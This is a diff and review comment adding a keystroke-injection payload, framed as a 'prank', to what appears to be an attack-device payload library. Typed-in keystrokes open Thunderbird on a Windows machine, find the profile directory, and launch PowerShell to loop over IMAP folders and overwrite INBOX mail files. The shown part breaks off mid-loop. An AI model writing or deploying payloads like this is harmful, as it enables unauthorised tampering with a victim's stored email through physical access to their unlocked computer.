payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt

```diff
@@ -0,0 +1,129 @@
+* REM ###################################################
+* REM #                                     		#
+* REM # Title       : Prank In The Middle - Thunderbird	#
+* REM # Author      : Aleff                 		#
+* REM # Version	  : 1.0                   		#
+* REM # Category	  : Prank                 	#
+* REM # Target	  : Windows 10/11         		#
+* REM #                                     		#
+* REM ###################################################
+
+* REM Open Thunderbird and goto settings
+QUACK GUI r
+QUACK STRING thunderbird
+QUACK ENTER
+QUACK DELAY 1000
+QUACK REPEAT 4 TAB
+QUACK ENTER
+QUACK DELAY 500
+QUACK UPARROW
+QUACK UPARROW
+QUACK ENTER
+QUACK DELAY 500
+QUACK UPARROW
+QUACK UPARROW
+QUACK UPARROW
+QUACK ENTER
+QUACK DELAY 500
+
+* REM Goto profile directory
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK ENTER
+QUACK DELAY 500
+
+* REM Copy the directory path
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK DELAY 500
+QUACK SPACE
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+QUACK CTRL c
+QUACK DELAY 500
+QUACK ALT F4
+QUACK DELAY 500
+
+* REM Open the powershell and goto the directory
+QUACK GUI r
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING cd 
+QUACK DELAY 500
+QUACK CTRL v
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+
+* REM Get the INBOX content and edit it overwriting. Then close the powershell
+QUACK STRING cd ImapMail
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING $directories = Get-ChildItem -Directory | Select-Object FullName
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING foreach ($dir in $directories) {
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING # Replace backslashes with slash
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING $newPath = $dir.FullName -replace '\\', '/'
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING # Add the sub-string “/INBOX” to the end
```

Comment:
`QUACK STRING` is the equivalent to `STRING` on the ducky and thus anything you are trying to inject must be in the language json.  Curly quotes are not in the language json.